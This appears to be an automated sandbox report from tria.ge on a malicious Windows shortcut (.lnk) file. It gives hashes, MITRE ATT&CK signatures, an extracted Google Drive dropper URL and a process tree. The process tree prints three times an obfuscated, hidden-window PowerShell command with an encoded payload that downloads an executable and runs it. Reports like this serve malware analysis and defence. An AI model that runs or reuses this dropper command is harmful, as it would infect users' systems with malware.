Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    28/09/2024, 10:05

General

  • Target

    fc1006824cb66d17c68f1ffa53b37c4b_JaffaCakes118.lnk

  • Size

    3KB

  • MD5

    fc1006824cb66d17c68f1ffa53b37c4b

  • SHA1

    c54b745011bccb3d068ba74a4e543cb2de1043a4

  • SHA256

    95ca946aef501e5114c26cb6ef895dbc29761b4f7d6bbccc22e4bfbde1be6759

  • SHA512

    1d14c5b3058c994cf542807a4341510453fda81ea9a67cfc5038b2f8fc5e80fca3271c44a9c937d2366a140e197ec605bf280a18278cae6886fa939fb28053c0

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=0B3AM8u080I_Pb2I2dXdkaUxHWm8

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\fc1006824cb66d17c68f1ffa53b37c4b_JaffaCakes118.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2384
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cMD /c PowERShelL.ExE -eXEcUtiOnPoLIcy byPass -WIndowSTyLE HIddeN -ENCoDeDcOMMaNd IAAoAE4AZQB3AC0ATwBCAEoARQBjAHQAIABTAFkAcwBUAEUATQAuAG4ARQBUAC4AVwBFAEIAYwBMAGkAZQBOAFQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABFACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAwAEIAMwBBAE0AOAB1ADAAOAAwAEkAXwBQAGIAMgBJADIAZABYAGQAawBhAFUAeABIAFcAbQA4AB0gIAAsACAAHSAkAEUAbgB2ADoAYQBwAHAAZABBAHQAYQBcAHYAdgByAGUAYQBkAGUAcwB4AHQALgBlAHgAZQAdICAAKQAgADsAIABpAG4AdgBvAEsARQAtAEkAdABlAG0AIAAdICQAZQBuAHYAOgBhAHAAUABkAGEAVABhAFwAdgB2AHIAZQBhAGQAZQBzAHgAdAAuAGUAeABlAB0g
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1976
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c PowERShelL.ExE -eXEcUtiOnPoLIcy byPass -WIndowSTyLE HIddeN -ENCoDeDcOMMaNd IAAoAE4AZQB3AC0ATwBCAEoARQBjAHQAIABTAFkAcwBUAEUATQAuAG4ARQBUAC4AVwBFAEIAYwBMAGkAZQBOAFQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABFACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAwAEIAMwBBAE0AOAB1ADAAOAAwAEkAXwBQAGIAMgBJADIAZABYAGQAawBhAFUAeABIAFcAbQA4AB0gIAAsACAAHSAkAEUAbgB2ADoAYQBwAHAAZABBAHQAYQBcAHYAdgByAGUAYQBkAGUAcwB4AHQALgBlAHgAZQAdICAAKQAgADsAIABpAG4AdgBvAEsARQAtAEkAdABlAG0AIAAdICQAZQBuAHYAOgBhAHAAUABkAGEAVABhAFwAdgB2AHIAZQBhAGQAZQBzAHgAdAAuAGUAeABlAB0g
        3⤵
        • Hide Artifacts: Hidden Window
        • Suspicious use of WriteProcessMemory
        PID:2748
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowERShelL.ExE -eXEcUtiOnPoLIcy byPass -WIndowSTyLE HIddeN -ENCoDeDcOMMaNd IAAoAE4AZQB3AC0ATwBCAEoARQBjAHQAIABTAFkAcwBUAEUATQAuAG4ARQBUAC4AVwBFAEIAYwBMAGkAZQBOAFQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABFACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAwAEIAMwBBAE0AOAB1ADAAOAAwAEkAXwBQAGIAMgBJADIAZABYAGQAawBhAFUAeABIAFcAbQA4AB0gIAAsACAAHSAkAEUAbgB2ADoAYQBwAHAAZABBAHQAYQBcAHYAdgByAGUAYQBkAGUAcwB4AHQALgBlAHgAZQAdICAAKQAgADsAIABpAG4AdgBvAEsARQAtAEkAdABlAG0AIAAdICQAZQBuAHYAOgBhAHAAUABkAGEAVABhAFwAdgB2AHIAZQBhAGQAZQBzAHgAdAAuAGUAeABlAB0g
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3004

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1976-38-0x000007FEF614E000-0x000007FEF614F000-memory.dmp

    Filesize

    4KB

  • memory/1976-39-0x000000001B440000-0x000000001B722000-memory.dmp

    Filesize

    2.9MB

  • memory/1976-40-0x0000000002780000-0x0000000002788000-memory.dmp

    Filesize

    32KB

  • memory/1976-41-0x000007FEF5E90000-0x000007FEF682D000-memory.dmp

    Filesize

    9.6MB

  • memory/1976-42-0x000007FEF5E90000-0x000007FEF682D000-memory.dmp

    Filesize

    9.6MB

  • memory/1976-47-0x000007FEF5E90000-0x000007FEF682D000-memory.dmp

    Filesize

    9.6MB